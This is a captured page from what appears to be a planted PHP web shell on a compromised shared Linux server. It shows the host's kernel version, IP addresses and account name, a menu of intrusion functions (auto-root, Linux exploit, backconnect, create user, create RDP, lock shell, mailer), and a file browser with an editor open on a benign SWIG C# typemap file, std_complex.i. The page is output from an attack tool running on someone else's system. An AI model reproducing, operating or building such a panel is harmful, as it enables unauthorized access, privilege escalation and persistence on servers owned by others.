Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
swig4.0 /
csharp /
[ HOME SHELL ]
Name
Size
Permission
Action
arrays_csharp.i
7.15
KB
-rw-r--r--
boost_intrusive_ptr.i
23.52
KB
-rw-r--r--
boost_shared_ptr.i
14.59
KB
-rw-r--r--
complex.i
109
B
-rw-r--r--
csharp.swg
39.83
KB
-rw-r--r--
csharphead.swg
15.99
KB
-rw-r--r--
csharpkw.swg
1.81
KB
-rw-r--r--
director.swg
1.23
KB
-rw-r--r--
enums.swg
2.87
KB
-rw-r--r--
enumsimple.swg
2.82
KB
-rw-r--r--
enumtypesafe.swg
4.69
KB
-rw-r--r--
std_array.i
6.96
KB
-rw-r--r--
std_auto_ptr.i
928
B
-rw-r--r--
std_common.i
102
B
-rw-r--r--
std_complex.i
2.66
KB
-rw-r--r--
std_deque.i
28
B
-rw-r--r--
std_except.i
2.24
KB
-rw-r--r--
std_list.i
15.34
KB
-rw-r--r--
std_map.i
10.82
KB
-rw-r--r--
std_pair.i
773
B
-rw-r--r--
std_set.i
9.51
KB
-rw-r--r--
std_shared_ptr.i
68
B
-rw-r--r--
std_string.i
3.1
KB
-rw-r--r--
std_vector.i
14.54
KB
-rw-r--r--
std_wstring.i
3.88
KB
-rw-r--r--
stl.i
291
B
-rw-r--r--
swiginterface.i
3.05
KB
-rw-r--r--
swigtype_inout.i
1.44
KB
-rw-r--r--
typemaps.i
10.46
KB
-rw-r--r--
wchar.i
3.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : std_complex.i
/* ----------------------------------------------------------------------------- * std_complex.i * * Typemaps for handling std::complex<float> and std::complex<double> as a .NET * System.Numerics.Complex type. Requires .NET 4 minimum. * ----------------------------------------------------------------------------- */ %{ #include <complex> %} %fragment("SwigSystemNumericsComplex", "header") { extern "C" { // Identical to the layout of System.Numerics.Complex, but does assume that it is // LayoutKind.Sequential on the managed side struct SwigSystemNumericsComplex { double real; double imag; }; } SWIGINTERN SwigSystemNumericsComplex SwigCreateSystemNumericsComplex(double real, double imag) { SwigSystemNumericsComplex cpx; cpx.real = real; cpx.imag = imag; return cpx; } } namespace std { %naturalvar complex; template<typename T> class complex { public: complex(T re = T(), T im = T()); }; } %define SWIG_COMPLEX_TYPEMAPS(T) %typemap(ctype, fragment="SwigSystemNumericsComplex") std::complex<T>, const std::complex<T> & "SwigSystemNumericsComplex" %typemap(imtype) std::complex<T>, const std::complex<T> & "System.Numerics.Complex" %typemap(cstype) std::complex<T>, const std::complex<T> & "System.Numerics.Complex" %typemap(in) std::complex<T> %{$1 = std::complex< double >($input.real, $input.imag);%} %typemap(in) const std::complex<T> &($*1_ltype temp) %{temp = std::complex< T >((T)$input.real, (T)$input.imag); $1 = &temp;%} %typemap(out, null="SwigCreateSystemNumericsComplex(0.0, 0.0)") std::complex<T> %{$result = SwigCreateSystemNumericsComplex($1.real(), $1.imag());%} %typemap(out, null="SwigCreateSystemNumericsComplex(0.0, 0.0)") const std::complex<T> & %{$result = SwigCreateSystemNumericsComplex($1->real(), $1->imag());%} %typemap(cstype) std::complex<T>, const std::complex<T> & "System.Numerics.Complex" %typemap(csin) std::complex<T>, const std::complex<T> & "$csinput" %typemap(csout, excode=SWIGEXCODE) std::complex<T>, const std::complex<T> & { System.Numerics.Complex ret = $imcall;$excode return ret; } %typemap(csvarin, excode=SWIGEXCODE2) const std::complex<T> & %{ set { $imcall;$excode } %} %typemap(csvarout, excode=SWIGEXCODE2) const std::complex<T> & %{ get { System.Numerics.Complex ret = $imcall;$excode return ret; } %} %template() std::complex<T>; %enddef // By default, typemaps for both std::complex<double> and std::complex<float> // are defined, but one of them can be disabled by predefining the // corresponding symbol before including this file. #ifndef SWIG_NO_STD_COMPLEX_DOUBLE SWIG_COMPLEX_TYPEMAPS(double) #endif #ifndef SWIG_NO_STD_COMPLEX_FLOAT SWIG_COMPLEX_TYPEMAPS(float) #endif
Close